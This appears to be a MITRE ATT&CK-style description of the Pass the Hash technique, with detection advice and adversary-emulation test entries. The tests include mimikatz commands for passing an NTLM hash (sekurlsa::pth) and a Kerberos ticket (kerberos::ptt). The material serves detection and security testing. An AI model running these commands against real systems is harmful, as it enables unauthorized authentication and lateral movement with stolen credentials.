Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)
Detection: Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.
Platforms: Windows
Data Sources: Authentication logs
System Requirements: Requires Microsoft Windows as target system
Contributors: Travis Smith, Tripwire
Note: must dump hashes first Reference
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| user | username | string | Administrator |
| domain | domain | string | atomic.local |
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a |
mimikatz # sekurlsa::pth /user:${user} /domain:${domain} /ntlm:${ntlm}
Similar to PTH, but attacking Kerberos
Supported Platforms: Windows
mimikatz # kerberos::ptt ${username}@${Domain}